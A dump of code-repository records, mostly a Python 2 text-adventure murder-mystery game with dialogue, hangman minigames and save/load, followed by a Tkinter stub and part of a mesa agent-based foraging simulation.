related to the victim?\"\\n\\\n\\n\\\nSakshi: \"Her name was Nicole. You can at least say her name. And she was my best friend.\" \\n\\\n\\n\\\nYou: \"I\\'m so sorry for your loss. Can you tell us what happened?\"\\n\\\n\\n\\\nSakshi: \"I don’t know. My boyfriend, Leng, invited our friends over for a few days so we can spend some time together and…all I know is Nicole was alive last night and this morning, when she didn\\'t come down for breakfast, the maid went to check on her and she was dead. Just like that. She shouldn\\'t be. Nicole was the sweetest, funniest, most fun person you could know.\"\\n\\\n\\n\\\nYou: \"Thank you for your time. We\\'ll be back later if we have more questions.\"'\n\nleng_1 = '\\nYou enter the kitchen to see a man pouring himself a glass of water, looking lost.\\n\\\n\\n\\\nYou: \"Hello. I am Detective Ativa and this is my partner, Detective Youngblood. We need to ask you some questions. What is your name?\"\\n\\\n\\n\\\nMan: \"My name is Leng, Leng Li.\" \\n\\\n\\n\\\nLiam: \"And how were you related to the victim?\"\\n\\\n\\n\\\nLeng: \"Nicole is, was, one of my best friends. She, my girlfriend Sakshi, Andres, and I grew up together.\"\\n\\\n\\n\\\nYou: \"I\\'m so sorry for your loss. Can you tell us what happened?\"\\n\\\n\\n\\\nLeng: \"All of us finally had some time off and so I invited everyone to stay for a few days. I was looking forward to it. I can\\'t believe the nightmare it has become. Everything was so normal and nostalgic. Nicole was having a blast the entire time, we all were. This morning…we all came for breakfast but Nicole wasn\\'t there. I told Bree, my maid, to call her. She screamed so loud and we all ran up there and saw…she was dead. I still can\\'t believe she\\'s really gone.\"\\n\\\n\\n\\\nYou: \"Thank you for your time. We\\'ll be back later if we have more questions.\"'\n\nbree_1 = '\\nYou enter the living room to see a woman nervously arranging a vase of flowers, her face disturbed.\\n\\\n\\n\\\nYou: \"Hello. I am Detective Ativa and this is my partner, Detective Youngblood. We need to ask you some questions. What is your name?\\n\\\n\\n\\\nWoman: \"My name is Bree Scholtz.\"\\n\\\n\\n\\\nLiam: \"And how were you related to the victim?\"\\n\\\n\\n\\\nBree: \"I\\'m not. I mean, I\\'m Mr. Li\\'s maid so I only knew Ms. Nicole in passing.\"\\n\\\n\\n\\\nYou: \"I understand. Can you tell us what happened? You found the body, correct?\"\\n\\\n\\n\\\nBree: \"Yes, it was horrible. Last night, Ms. Nicole had asked me to bring her a cup of the special blend that Mr. Li had set aside for her in the morning at precisely 8 a.m. Unfortunately, I didn\\'t get up there until about 8:30 a.m. and Ms. Nicole was in the shower. I helped Mr. Li in the kitchen until breakfast was to be served. Mr. Li sent me upstairs when Ms. Nicole didn\\'t come down. I went to her room and opened the door to see her lying on the ground, completely still. I screamed and they all came running up. I don\\'t remember who said she was dead; I was in shock. It was a truly horrifying experience.\"\\n\\\n\\n\\\nLiam: \"So you were also the last person to see the victim alive?\"\\n\\\n\\n\\\nBree: \"I suppose so. Ms. Nicole was in the shower when I went there so I never saw her exactly.\"\\n\\\n\\n\\\nYou: \"Thank you for your time. We\\'ll be back later if we have more questions.\"'\n\nandres_1 = '\\nYou enter the garden to see a man sitting in the garden, mournfully playing a tune on his clarinet. \\n\\\n\\n\\\nYou: \"Hello. I am Detective Ativa and this is my partner, Detective Youngblood. We need to ask you some questions. What is your name?\"\\n\\\n\\n\\\nMan: \"I\\'m Dr. Andres Leal.\" \\n\\\n\\n\\\nLiam: \"And how were you related to the victim?\"\\n\\\n\\n\\\nAndres: \"Nicole was one of my closest friends. Sakshi, Leng, Nicole, and I have been best friends since as long as I can remember.\"\\n\\\n\\n\\\nYou: \"I\\'m so sorry for your loss. Can you tell us what happened?\"\\n\\\n\\n\\\nAndres: \"Leng had invited all of us for the week and it was going great. It was nice to all hang out again. This morning, the maid went up to call Nicole down for breakfast and she just started screaming. We all ran up there and Nicole was lying on the floor. I went over to her and checked if there was a pulse but I couldn\\'t find one and she wasn\\'t breathing. I tried to do CPR but…we were too late.\"\\n\\\n\\n\\\nYou: \"Thank you for your time. We\\'ll be back later if we have more questions.\"'\n\ngabi_2 = '\\nYou enter the lab to see Gabi typing quickly on a computer.\\n\\\n\\n\\\nYou: \"Hey, Gabriella.\"\\n\\\n\\n\\\nGabriella: \"Karolina, Liam, my two fav idiots.\"\\n\\\n\\n\\\nLiam: \"What\\'s the good word, Gabi?\"\\n\\\n\\n\\\nGabriella: \"First, let me say thank you for such a sweet case. I mean, Twilight Grove? Money City!\"\\n\\\n\\n\\\nLiam: \"You\\'re telling me. The mansion is so huge, I keep getting confused which room is where.\"\\n\\\n\\n\\\nYou: *clear throat* \"Guys, focus.\" \\n\\\n\\n\\\nGabriella: \"Right, you\\'re right. I\\'m still waiting on the coroner to send me the full report but what I can tell you is that this tea cup contains poison.\"\\n\\\n\\n\\\nLiam: \"What kind of poison?\"\\n\\\n\\n\\\nGabriella: \"I don\\'t know yet. And before you ask, I am working on it and the cellphone. You\\'ll have to come back later. Why don\\'t you two go back and snoop around. Make yourselves useful and bring some more goodies!\"'\n\ngabi_3 = '\\nGabi: \"Got more? No? I\\'m not a miracle worker; bring me something I can work my magic on.\"'\n\nriddle_win = 'You find some financial paperwork.\\n\\\nYou: \"This is interesting.\"\\n\\\nLiam: \"What is it?\"\\n\\\nYou: \"Looks like Sakshi and Nicole may have been best friends but their companies are business rivals. We need to have another chat--\"\\n\\\nAt this moment, Sakshi walks in.\\n\\\nSakshi: \"What are you two doing here?\"\\n'\n\nsofa = 'You: \"A…a-choo!\"\\n\\\nLiam: \"That maid must be doing a sub-par job.\"\\n'\n\nbookshelf = 'You: \"Wow, he has a great collection.\"\\n\\\nLiam: \"But nothing useful for the case.\"\\n'\n\nsakshi_2 = 'You: \"Sakshi, it looks like Nicole may have been poisoned.\"\\n\\\nSakshi: \"That\\'s horrible. Was it her tea? That\\'s the first thing she drinks every morning.\"\\n\\\nLiam: \"So you knew about that?\"\\n\\\nSakshi: \"Everyone knows about that.\"\\n\\\nYou: \"Does everyone also know about your business feud with you best friend?\"\\n\\\nSakshi: \"I\\'d hardly call it a feud. If you\\'re even asking that question, you don\\'t know Nicole very well. Nicole is,\\\nwas, a sweetheart but she hated business. She didn\\'t make any of the decisions.\"\\n\\\nLiam: \"So what you\\'re saying is that your company would be better off if you killed the CEO but not Nicole?\"\\n\\\nSakshi: \"Exact—wait, what? That\\'s not what I\\'m saying at all! Are you accusing me of killing my best friend? I\\\nwould never! And especially not over business! If anyone here did it, it\\'s probably Andres. Leave me out of it.\"\\n\\\nYou: \"We\\'ll come back when we have more questions.\"\\n'\n\ncupboard = 'You find a small container of tea grounds.\\n\\\nYou: \"This is probably the tea supply Leng had set aside for Nicole.\"\\n\\\nLiam: \"We should ask him about that. Why did he set aside a special little box for her?\"'\n\nfridge = 'Liam: \"I\\'m starving. You think they would mind if I grabbed a slice of pizza or something?\"\\n\\\nYou: \"At a crime scene where someone was poisoned? Yeah, you take that chance.\"'\n\nsink = 'You: \"Nothing but dirty dishes.\"\\n\\\nLiam: \"Figures. Don\\'t look at me, it\\'s not my job to clean them.\"'\n\nleng_2 = 'You: \"Leng, it seems like Nicole was poisoned.\"\\n\\\nLeng: \"Oh my god, that\\'s terrible. But how?\"\\n\\\nLiam: \"Maybe you can help us with that. Any reason you had special tea set aside for Nicole?\"\\n\\\nLeng: \"Yes, it\\'s called being considerate! Nicole loved that tea. It\\'s the same reason I bought Pop-tarts for Andres \\\nand organic orange juice for Sakshi. Are you guys insinuating that I killed her? Why would I? I cared about Nicole \\\nvery much. If anyone did it, it\\'s probably Bree! She\\'s the one who took Nicole her tea.\"\\n\\\nYou: \"We\\'ll come back when we have more questions.\"'\n\nbree_2 = 'You: \"Bree, it seems that Nicole may have been poisoned.\"\\n\\\nBree: \"That\\'s awful.\"\\n\\\nLiam: \"Poison was found in her teacup. Can you explain how that happened?\"\\n\\\nBree: \"Are you saying that I--? No, no, of course not! I had nothing to do with it. All I did was prepare the tea Mr. Li\\\nand Ms. Nicole asked me to. That\\'s it! Why would I hurt Ms. Nicole?\"\\n\\\nYou: \"We\\'ll come back when we have more questions.\"'\n\ntrees = 'Liam: \"Yew!\"\\n\\\nYou: \"What?\"\\n\\\nLiam: \"I stepped on yew berries.\"\\n\\\nYou roll your eyes.'\n\nbushes = 'Liam: \"Any minute, we\\'re going to tumble down a rabbit hole.\"\\n\\\nYou: \"I don\\'t think that’s exactly how Alice in Wonderland worked.\"'\n\ngazebo = 'You find an old newspaper clipping that describes Andres punching another scientist.\\n\\\nYou: \"Who would have thought clarinet-boy would have a temper?\"\\n\\\nLiam: \"I did, I mean, it\\'s the clarinet. Under-appreciated in the music world just like the violas. That would make \\\nanyone angry.\"'\n\nandres_2 = 'You: \"Andres, it seems that Nicole may have been poisoned.\"\\n\\\nAndres: \"That\\'s so horrible. She didn\\'t deserve that.\"\\n\\\nLiam: \"No one deserves that. As a doctor, you would certainly know a good deal about poisons, right?\"\\n\\\nAndres: \"What are you trying to say? That I killed her? I would never do something like that. Nicole and I have \\\nalways had our ups and downs. We were even engaged at one point but we have always remained good friends and I \\\nwould never hurt her. You\\'re right about one thing though: I am a doctor but that means I save lives, not take them.\"\\n\\\nYou: \"We\\'ll come back when we have more questions.\"'\n\ngabi_4 = 'Gabriella: \"I have good news, bad news, and confusing news.\"\\n\\\nLiam: \"Lay it on us.\"\\n\\\nGabriella: \"The tea grounds you brought; definitely poisoned.\"\\n\\\nYou: \"So that\\'s the good news?\"\\n\\\nGabriella: \"No, that\\'s the confusing news because the coroner sent me Nicole\\'s stomach contents and she didn\\'t drink \\\nany tea at all.\"\\n\\\nLiam: \"Then what poisoned her?\"\\n\\\nGabriella: \"You should check her room again. Maybe she ingested something else. Her blood toxicology report \\\nshowed opioid use. And now the good news is I opened Nicole\\'s phone. The bad news is: I opened Nicole\\'s phone.\"\\n\\\nYou: \"Meaning…?\"\\n\\\nGabriella: \"Entertain me for a bit and you get the passcode.\"'\n\nmessage_unknown = 'Unknown: Turn me in and I\\'ll spill your secret.'\n\nmessage_leng = 'Leng: Hey, babe.\\n\\\nNicole: Hey, sweets. Excited for this week. Speaking of which…\\n\\\nLeng: Please don\\'t start.\\n\\\nNicole: If you\\'re serious about us, you have to tell Sakshi. I don\\'t care about your restaurant funding. I\\'ll fund it!\\n\\\nLeng: Nicky, please.\\n\\\nNicole: It\\'ll get “her” off my back.\\n\\\nLeng: We\\'ll talk.'\n\nmessage_andres = 'Nicole: I\\'m glad you\\'re coming. Leng said you weren\\'t sure.\\n\\\nAndres: I\\'ll be there. Leng better have my Pop Tarts.\\n\\\nNicole: Ha ha. I\\'ll tell him. I hope we can clear some things up this week.\\n\\\nAndres: I already said I\\'m over it.\\n\\\nNicole: But there\\'s more. I want to do it in person.\\n\\\nAndres: Okay, see you soon.'\n\nend_messages = 'You: We have a lot more interviews to conduct.\"\\n\\\nLiam: \"And we still need to find what poisoned Nicole.\"\\n\\\nGabriella: \"And you have to sign my legalize Wiebe campaign.\"\\n\\\nYou and Liam give Gabriella a look.\\n\\\nGabriella: \"What? You guys have work to do. Get out of here.\"'\n\n#-------------------------------------------------------------------------------\n\n#Rooms\n\n#Have three parameters in __init__ for the item name\n#Refer to it as you did with dialogue\n \nclass Room:\n def __init__(self, name, description, item, item_two, item_three, item_four):\n self.name = name\n self.description = description\n self.item = item\n self.item_two = item_two\n self.item_three = item_three\n self.item_four = item_four\n \n def see_item(self, cosa):\n print cosa.description\n \n def search_room(self):\n print \n \npolice_office = Room('Police Chief Ativa\\'s Office', 'This is your father\\'s police \\\noffice. He is sitting at his desk doing some paperwork.', None, None, None, None)\n\nstudy = Room('The Study', 'This study is where Sakshi stays.', paperwork, chair, pen, water_glass)\n\ngarden = Room('Garden', 'In this garden is Andres.', wrapper, clarinet, bench, news_clipping)\n\nliving_room = Room('Living Room', 'This room is where Bree resides.', vase_2, pen_2, desk, None)\n\nkitchen = Room('Kitchen', 'This kitchen is where Leng is located.', tea_grounds, water_glass_2, vase, fridge)\n\nbedroom = Room('Nicole\\'s Bedroom', 'This is the crime scene. A woman\\'s body lies \\\nnext to the bed, a splattered tea cup by her side. You may examine the body, pick up the teacup, \\\nand look under the bed.', cell_phone, teacup, body, morphine_capsules)\n\nlab = Room('Gabi\\'s Lab', 'This lab is where you can always find Gabi. Come here \\\nwhen you need some evidence examined!', None, None, None, None)\n\nfront_yard = Room('Mansion\\'s Front Yard', 'A lush green lawn spreads like a blanket in front of a massive and ornately structured mansion, the view only marred by splashes of trash.\\n', pill_bottle, None, None, None)\n\nglobal node \nnode = police_office \n\n#Initiators\nstart = 0 \npill_bottle = 0\ncase_solved = False \nwarning = 0\nconversation = 0\nsakshi_one = 0\nleng_one = 0\nbree_one = 0\nandres_one = 0\narrival = 0\nbedroom_arrival = 0\nsakshi_two = 0\nleng_two = 0\nbree_two = 0\nandres_two = 0\ngabi_four = 0\nmessages_read = 0\nleng_message = 0\nandres_message = 0\nunknown_message = 0\nmessage_end = 0\n\nglobal financial_riddle\nfinancial_riddle = False\n\nglobal passcode_won\npasscode_won = False\n\nglobal game_one\ngame_one = False\n\nglobal game_two\ngame_two = False\n\n\n\ndef save():\n global node, user_inventory, start, case_solved, conversation, sakshi_one, sakshi_two, bree_one, bree_two, leng_one, leng_two, andres_one, andres_two, messages_read\n with open('savegame.dat', 'wb') as f:\n pickle.dump([node, user_inventory, start, case_solved, conversation, sakshi_one, sakshi_two, bree_one, bree_two, leng_one, leng_two, andres_one, andres_two, messages_read], f, protocol=2)\n print 'Game successfully saved'\n \ndef load():\n global node, user_inventory, start, case_solved, conversation, sakshi_one, sakshi_two, bree_one, bree_two, leng_one, leng_two, andres_one, andres_two, messages_read\n with open('savegame.dat', 'rb') as f:\n node, user_inventory, start, case_solved, conversation, sakshi_one, sakshi_two, bree_one, bree_two, leng_one, leng_two, andres_one, andres_two, messages_read = pickle.load(f)\n print 'Game successfully loaded'\n#--------------------------------------------------------------------------------------------------------------------- \n\n\n\n\n#Actual Gameplay \n \nwhile True:\n while warning == 0:\n print('\\nDisclaimer: This game is not yet completely finished.\\n\\n')\n warning +=1\n print('\\n')\n print node.name\n \n if node == police_office and start == 0:\n print('\\n')\n print(scene_1)\n start +=1\n \n if node == police_office and case_solved == False:\n print(chief)\n \n if node == lab and len(user_inventory.inventory) == 0:\n print(gabi)\n \n if node == lab and len(user_inventory.inventory) == 1 and conversation <=4:\n print('\\nGabi: There\\'s another piece of evidence lurking around in that house. Go forth!')\n \n if node == front_yard and arrival == 0:\n print(scene_2)\n arrival+=1\n \n if node == bedroom and bedroom_arrival == 0:\n print(scene_3)\n bedroom_arrival+=1\n \n if node == study and sakshi_one == 0:\n print(sakshi_1)\n sakshi_one+=1\n conversation+=1\n \n if node == garden and andres_one == 0:\n print(andres_1)\n andres_one+=1\n conversation+=1\n \n if node == kitchen and leng_one == 0:\n print(leng_1)\n leng_one+=1\n conversation+=1\n \n if node == living_room and bree_one == 0:\n print(bree_1)\n bree_one+=1\n conversation +=1\n \n if conversation == 4 and len(user_inventory.inventory) == 2 and node == lab:\n print(gabi_2)\n conversation +=1\n \n if sakshi_two == 0 and sakshi_one == 1 and conversation == 4:\n study.description = 'You may now look under the sofa, in the bookshelf, and in the desk. Maybe there\\'s some evidence in here.'\n \n if leng_two == 0 and leng_one == 1 and conversation == 4:\n kitchen.description = 'You may search in the cupboard, in the sink, or in the fridge. Could there be something incriminating here?'\n \n if andres_two == 0 and andres_one == 1 and conversation == 4:\n garden.description = 'You can check out the area behind the trees, in the bushes, or in the gazebo. There might be something intresting here.' \n \n \n if node in [police_office, lab]:\n print('\\nYou can go to:\\n\\\n -mansion\\n\\\n -lab\\n\\\n -police office\\n\\\n \\n\\\nAdditional commands:\\n\\\n - search')\n elif node in [study, kitchen, front_yard, living_room, garden]:\n print('\\nYou can go to:\\n\\\n - study\\n\\\n - mansion\\n\\\n - kitchen\\n\\\n - crime scene\\n\\\n - living room\\n\\\n - garden\\n\\\n - police office\\n\\\n - lab\\n\\\n \\n\\\nAdditional commands:\\n\\\n - search\\n\\\n - pick up *item name*')\n \n user_command = raw_input('> ') \n \n if user_command in ['q', 'quit', 'exit']:\n sys.exit(0)\n \n elif user_command =='save':\n save()\n elif user_command =='load':\n load()\n \n elif 'police office' in user_command:\n node = police_office\n \n elif 'study' in user_command and node in [front_yard, garden, living_room, kitchen, bedroom]:\n node = study\n \n elif 'garden' in user_command and node in [front_yard, study, living_room, kitchen, bedroom]:\n node = garden\n \n elif 'living room' in user_command and node in [front_yard, garden, study, kitchen, bedroom]:\n node = living_room\n \n elif 'kitchen' in user_command and node in [front_yard, garden, living_room, study, bedroom]:\n node = kitchen\n \n elif 'crime scene' in user_command and node in [front_yard, garden, living_room, kitchen, study]:\n node = bedroom\n \n elif 'lab' in user_command:\n node = lab\n \n elif 'mansion' in user_command:\n node = front_yard\n \n elif 'search' in user_command:\n print node.description\n \n #Games----------------------------------------------------------------------------------------------------------------\n \n #Setting up variables to be called on later\n \n def passcode_hangman():\n\n life = 5\n bank = [\"zero one twenty nine\"]\n word = random.choice(bank)\n letters_left = list(set(word)) #creating a list of letters in word\n if ' ' in word:\n letters_left.remove(' ') #removing the space if there is one\n \n user_guesses = [] #More variables\n wrong_answers = 0\n print (\"You have five chances right now.\")\n while life > 0: \n \n for letter in word:\n if letter in user_guesses:\n print letter,\n elif letter == ' ':\n print letter,\n else:\n print ('_'), \n \n current_guess = raw_input(\"Guess a letter: \") #This takes in raw input\n user_guesses.append(current_guess)\n if current_guess in word: #If guess in word, remove from letters_left\n letters_left.remove(current_guess) \n #print letters_left\n print user_guesses #Prints guesses so far\n if current_guess not in word: #If you guess incorrectly\n life -= 1\n wrong_answers += 1\n print (\"Your life count: \") + str(life)\n \n if len(letters_left) == 0:\n break\n \n if life<=0:\n print('Gabriella: \"Ha! Come back and try again.\"')\n \n else:\n print('\\n')\n print('Gabriella: \"Which conversation do you wanna read?\"\\\n - Leng\\n\\\n - Andres\\n\\\n - Unknown')\n hang.inventory.append(pic_3)\n \n \n \n def andres_hangman():\n life = 5\n bank = [\"temper tantrum\"]\n word = random.choice(bank)\n letters_left = list(set(word)) #creating a list of letters in word\n if ' ' in word:\n letters_left.remove(' ') #removing the space if there is one\n \n user_guesses = [] #More variables\n wrong_answers = 0\n print (\"You have five chances right now.\")\n while life > 0: \n \n for letter in word:\n if letter in user_guesses:\n print letter,\n elif letter == ' ':\n print letter,\n else:\n print ('_'), \n \n current_guess = raw_input(\"Guess a letter: \") #This takes in raw input\n user_guesses.append(current_guess)\n if current_guess in word: #If guess in word, remove from letters_left\n letters_left.remove(current_guess) \n #print letters_left\n if current_guess not in word: #If you guess incorrectly\n life -= 1\n wrong_answers += 1\n print (\"Your life count: \") + str(life)\n \n if len(letters_left) == 0:\n break\n \n if life <=0:\n print 'You\\'ve lost this minigame, come back and try again.'\n else:\n print('\\n')\n print(gazebo)\n hang.inventory.append(pic)\n \n def leng_hangman():\n life = 5\n bank = [\"poisonous tea?\"]\n word = random.choice(bank)\n letters_left = list(set(word)) #creating a list of letters in word\n if ' ' in word:\n letters_left.remove(' ') #removing the space if there is one\n if '?' in word:\n letters_left.remove('?')\n \n user_guesses = [] #More variables\n wrong_answers = 0\n while life > 0: \n \n for letter in word: \n if letter in user_guesses:\n print letter,\n elif letter == ' ':\n print letter,\n elif letter == '?':\n print letter,\n else:\n print ('_'), \n \n current_guess = raw_input(\"Guess a letter: \") #This takes in raw input\n user_guesses.append(current_guess)\n if current_guess in word: #If guess in word, remove from letters_left\n letters_left.remove(current_guess) \n #print letters_left\n if current_guess not in word: #If you guess incorrectly\n life -= 1\n wrong_answers += 1\n print (\"Your life count: %s\")%life\n \n if len(letters_left) == 0:\n break\n \n if life <=0:\n print 'You\\'ve messed up on this minigame. Come back and try again.'\n else: \n print('\\n') \n print(cupboard)\n hang.inventory.append(pic_2)\n \n\n def financial_riddle():\n key = 'bree'\n #Time = 20 seconds; if they don\\'t leave in time, lose game.\n \n riddle = 'There is one of us here in the mansion\\n\\\n Who is not what they seem\\n\\\n They may seem to be kind\\n\\\n But that\\'s a mirage and a dream\\n\\\n Simple-like fashion\\n\\\n With formal like language\\n\\\n And a nervous register\\n\\\n Who am I?\\n'\n \n print riddle\n \n user_riddle_guess = raw_input('Take a guess:\\n')\n if user_riddle_guess.strip().lower() == key:\n print 'You have guessed correctly;\\n\\\n it is Bree. Press \"enter\" to continue and see \\n\\\n what you find.' \n user_riddle_guess_two = raw_input('> ')\n if user_riddle_guess_two.strip() == '':\n user_inventory.inventory.append(paperwork)\n print riddle_win \n \n else:\n print 'Sorry. That\\'s not who it is.\\n'\n print 'You and Liam quickly cover your ears.\\n\\\n Liam: \"What is that horrible ringing noise?!\"\\n\\\n You: \"We must have set off an alarm when we tried opening the desk lock!\\n\\\n Liam: \"We have to get out of the mansion!\"\\n\\\n You: \"Now!!\"'\n \n if financial_riddle == False and node == study and sakshi_one >0:\n if 'desk' in user_command:\n financial_riddle()\n \n elif 'under sofa' in user_command:\n print(sofa)\n \n elif 'bookshelf'in user_command:\n print(bookshelf)\n \n if paperwork in user_inventory.inventory:\n financial_riddle = True\n \n if financial_riddle == True and node == study and sakshi_two == 0 and sakshi_one>0:\n print(sakshi_2)\n sakshi_two+=1\n \n if game_one == False and node == garden and andres_one >0:\n if 'gazebo' in user_command:\n andres_hangman()\n \n elif 'bushes' in user_command:\n print(bushes)\n \n elif 'trees' in user_command:\n print(trees)\n \n \n if pic in hang.inventory:\n game_one = True \n \n if game_one == True and node == garden and andres_two == 0 and andres_one >0:\n print(andres_2)\n andres_two+=1\n \n if game_two == False and node == kitchen and leng_one >0:\n if 'cupboard' in user_command:\n leng_hangman()\n \n elif 'fridge' in user_command:\n print(fridge)\n \n elif 'sink' in user_command:\n print(sink)\n \n if pic_2 in hang.inventory:\n game_two = True\n \n if game_two == True and node == kitchen and leng_two == 0 and leng_one >0:\n print(leng_2)\n leng_two +=1\n \n if node == living_room and bree_two == 0 and bree_one >0:\n print(bree_2)\n bree_two +=1\n \n if leng_two == 1 and bree_two == 1 and andres_two == 1 and sakshi_two == 1 and node == lab:\n print(gabi_4)\n passcode_hangman()\n \n if messages_read < 3 and pic_3 in hang.inventory:\n \n if 'leng' in user_command:\n print(message_leng)\n leng_message +=1\n if leng_message == 1:\n messages_read +=1\n \n if 'andres' in user_command:\n print(message_andres)\n andres_message +=1\n if andres_message == 1:\n messages_read +=1\n \n if 'unknown' in user_command:\n print(message_unknown)\n unknown_message +=1\n if unknown_message ==1:\n messages_read +=1\n \n if messages_read == 3 and node == lab and message_end == 0:\n print(end_messages)\n message_end+=1\n print('\\nWell, that\\'s all the sleuthing we have for now!')\n \n \n elif 'examine body' in user_command:\n print(examine)\n \n elif user_command == 'pick up chair' and node == study:\n chair.pick_up(user_inventory)\n \n elif user_command == 'pick up glass' and node == study:\n water_glass.pick_up(user_inventory)\n \n elif user_command == 'pick up pen' and node == study:\n pen.pick_up(user_inventory)\n \n elif user_command == 'pick up cell phone' and node == bedroom:\n cell_phone.pick_up(user_inventory)\n \n elif user_command == 'look under bed' and node == bedroom:\n print(phone)\n \n elif user_command == 'pick up teacup' and node == bedroom:\n teacup.pick_up(user_inventory)\n print(cup)\n \n elif user_command == 'pick up morphine capsules' and node == bedroom:\n morphine_capsules.pick_up(user_inventory)\n \n elif user_command == 'check trash' and node == front_yard:\n print \n \n elif user_command == 'pick up pill bottle' and node == front_yard:\n pill_bottle.pick_up(user_inventory)\n pill_bottle+=1\n \n elif user_command == 'pick up vase' and node == living_room:\n vase_2.pick_up(user_inventory)\n \n elif user_command == 'pick up pen' and node == living_room:\n pen_2.pick_up(user_inventory)\n \n elif user_command == 'pick up wrapper' and node == garden:\n wrapper.pick_up(user_inventory)\n \n elif user_command == 'pick up clarinet' and node == garden:\n clarinet.pick_up(user_inventory)\n\n elif user_command == 'pick up news clipping' and node == garden:\n news_clipping.pick_up(user_inventory)\n \n else:\n print '?'\n\n#-------------------------------------------------------------------------------\n \n#Do dialogue in order this by continously calling the dialogue 'say' function\n#Progress stories this way\n \n#Win Conditions as a class to make sure that the person accomplished everything \n#before winning\n#Series of red flags/conditionals to make sure that the tasks are completed \n \n\n\n#Hangman\n\n#Numerical Riddle (1982)\n\n#Riddle\n\n#Hangman\n\n#Riddle\n\n#Numerical Riddle (Passcode = (0129))\n #- Tells you which digits you got correct and which you didn't\n #- \n \n#-------------------------------------------------------------------------------\n \n"
},
{
"alpha_fraction": 0.6785714030265808,
"alphanum_fraction": 0.711904764175415,
"avg_line_length": 29.071428298950195,
"blob_id": "06ea7364ae48a3674622d9bf70d4f5c1c268e186",
"content_id": "9d8b8a46670d86f31975fd00e848e6f760340166",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 420,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 14,
"path": "/Caroline GUI.py",
"repo_name": "SumanjitGill/ChooseYourAdventureStory",
"src_encoding": "UTF-8",
"text": "import Tkinter, tkFont\n\nroot = Tkinter.Tk()\nroot.title('Sin')\n\ncanvas = Tkinter.Canvas(root, height = 750, width = 1400, relief = Tkinter.RAISED, bg = 'white')\ncanvas.grid()\n\nscrollbar = Tkinter.Scrollbar(root)\nscrollbar.grid(row = 0, column = 6, rowspan = 4, sticky = Tkinter.N + Tkinter.S)\n\neditor = Tkinter.Text(mastr=canvas, width = 45, height = 10, yscroll = scrollbar.set)\n\nscrollbar.config(command = editor.yview)"
}
] | 6 |
dadaromeo/adventures-in-dataland
|
https://github.com/dadaromeo/adventures-in-dataland
|
736c3b83920c784183d5eaf6c6d294701ebdb799
|
67bceed73b59ee0325c2c9c3ce6069286bd88771
|
a034e0e0f3316071c9ad9fb13ee82436ae654a19
|
refs/heads/master
| 2021-06-28T05:10:23.201248 | 2017-09-17T00:10:01 | 2017-09-17T00:10:01 | 62,259,480 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5476522445678711,
"alphanum_fraction": 0.5541608333587646,
"avg_line_length": 32.625,
"blob_id": "5ae2a5fe08a990abeeb4f71c2a5796c3d32ad847",
"content_id": "7eb5f6cd1928a6ee362f4d0915b044c9b38cebe4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2151,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 64,
"path": "/foraging/model.py",
"repo_name": "dadaromeo/adventures-in-dataland",
"src_encoding": "UTF-8",
"text": "from mesa.model import Model\nfrom mesa.space import SingleGrid\nfrom mesa.time import RandomActivation\nfrom mesa.datacollection import DataCollector\n\nfrom foraging.agents import Bean, Corn, Soy, Bug\n\nclass Foraging(Model):\n \n number_of_bean = 0\n number_of_corn = 0\n number_of_soy = 0\n \n def __init__(self, width=50, height=50, torus=True, num_bug=50, seed=42, strategy=None):\n super().__init__(seed=seed)\n self.number_of_bug = num_bug\n if not(strategy in [\"stick\", \"switch\"]):\n raise TypeError(\"'strategy' must be one of {stick, switch}\")\n self.strategy = strategy\n \n self.grid = SingleGrid(width, height, torus)\n self.schedule = RandomActivation(self)\n data = {\"Bean\": lambda m: m.number_of_bean,\n \"Corn\": lambda m: m.number_of_corn,\n \"Soy\": lambda m: m.number_of_soy,\n \"Bug\": lambda m: m.number_of_bug,\n }\n self.datacollector = DataCollector(data)\n \n # create foods\n self._populate(Bean)\n self._populate(Corn)\n self._populate(Soy)\n \n # create bugs\n for i in range(self.number_of_bug):\n pos = self.grid.find_empty()\n bug = Bug(i, self)\n bug.strategy = self.strategy\n self.grid.place_agent(bug, pos)\n self.schedule.add(bug)\n \n def step(self):\n self.schedule.step()\n self.datacollector.collect(self)\n \n if not(self.grid.exists_empty_cells()):\n self.running = False\n \n def _populate(self, food_type):\n prefix = \"number_of_{}\"\n \n counter = 0\n while counter < food_type.density * (self.grid.width * self.grid.height):\n pos = self.grid.find_empty()\n food = food_type(counter, self)\n self.grid.place_agent(food, pos)\n self.schedule.add(food)\n food_name = food_type.__name__.lower()\n attr_name = prefix.format(food_name)\n val = getattr(self, attr_name)\n val += 1\n setattr(self, attr_name, val)\n counter += 1"
},
{
"alpha_fraction": 0.6227164268493652,
"alphanum_fraction": 0.6314535140991211,
"avg_line_length": 26.9777774810791,
"blob_id": "09b0d0c94a7f3661c8aa9b3deb0baf53ea265c9a",
"content_id": "8b55e7e5d0ad9ceb2b260c0fff1bbc76d610bcec",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1259,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 45,
"path": "/foraging/server.py",
"repo_name": "dadaromeo/adventures-in-dataland",
"src_encoding": "UTF-8",
"text": "from mesa.visualization.modules import CanvasGrid, ChartModule\nfrom mesa.visualization.ModularVisualization import ModularServer\n\nfrom foraging.agents import Bean, Corn, Soy, Bug\nfrom foraging.model import Foraging\n\nwidth = 50\nheight = 50\n\ndef food_portrayal(agent):\n \n if agent is None:\n return\n \n portrayal = {\"Shape\": \"rect\", \"Filled\": \"true\", \"w\": 0.8, \"h\": 0.8, \"Layer\": 0}\n \n if type(agent) is Bean:\n portrayal[\"Color\"] = \"cornflowerblue\"\n \n elif type(agent) is Corn:\n portrayal[\"Color\"] = \"blueviolet\"\n \n elif type(agent) is Soy:\n portrayal[\"Color\"] = \"forestgreen\"\n \n elif type(agent) is Bug:\n portrayal[\"Shape\"] = \"circle\"\n portrayal[\"Color\"] = \"tomato\"\n portrayal[\"r\"] = 1\n portrayal[\"Layer\"] = 1\n \n return portrayal\n\nbean = {\"Label\": \"Bean\", \"Color\": \"cornflowerblue\"}\ncorn = {\"Label\": \"Corn\", \"Color\": \"blueviolet\"}\nsoy = {\"Label\": \"Soy\", \"Color\": \"forestgreen\"}\nbug = {\"Label\": \"Bug\", \"Color\": \"tomato\"}\n\ncanvas = 